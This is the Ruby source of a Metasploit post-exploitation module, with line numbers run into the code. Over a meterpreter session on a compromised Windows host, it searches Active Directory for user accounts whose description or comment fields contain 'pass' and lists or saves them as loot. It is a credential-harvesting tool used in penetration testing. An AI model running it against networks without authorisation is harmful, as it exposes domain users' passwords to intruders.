Path: blob/master/modules/post/windows/gather/enum_ad_user_comments.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Auxiliary::Report7include Msf::Post::Windows::LDAP89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Windows Gather Active Directory User Comments',14'Description' => %q{15This module will enumerate user accounts in the default Active Domain (AD) directory which16contain 'pass' in their description or comment (case-insensitive) by default. In some cases,17such users have their passwords specified in these fields.18},19'License' => MSF_LICENSE,20'Author' => [ 'Ben Campbell' ],21'Platform' => [ 'win' ],22'SessionTypes' => [ 'meterpreter' ],23'References' => [24['URL', 'http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx'],25],26'Notes' => {27'Stability' => [CRASH_SAFE],28'SideEffects' => [],29'Reliability' => []30}31)32)3334register_options([35OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),36OptString.new('FIELDS', [true, 'Fields to retrieve.', 'userPrincipalName,sAMAccountName,userAccountControl,comment,description']),37OptString.new('FILTER', [true, 'Search filter.', '(&(&(objectCategory=person)(objectClass=user))(|(description=*pass*)(comment=*pass*)))']),38])39end4041def run42fields = datastore['FIELDS'].gsub(/\s+/, '').split(',')43search_filter = datastore['FILTER']44max_search = datastore['MAX_SEARCH']4546begin47q = query(search_filter, max_search, fields)48if q.nil? || q[:results].empty?49return50end51rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e52# Can't bind or in a network w/ limited accounts53print_error(e.message)54return55end5657# Results table holds raw string data58results_table = Rex::Text::Table.new(59'Header' => 'Domain Users',60'Indent' => 1,61'SortIndex' => -1,62'Columns' => fields63)6465q[:results].each do |result|66row = []6768result.each do |field|69if field[:value].nil?70row << ''71else72row << field[:value]7374end75end7677results_table << row78end7980print_line results_table.to_s8182if datastore['STORE_LOOT']83stored_path = store_loot('ad.users', 'text/plain', session, results_table.to_csv)84print_good("Results saved to: #{stored_path}")85end86end87end888990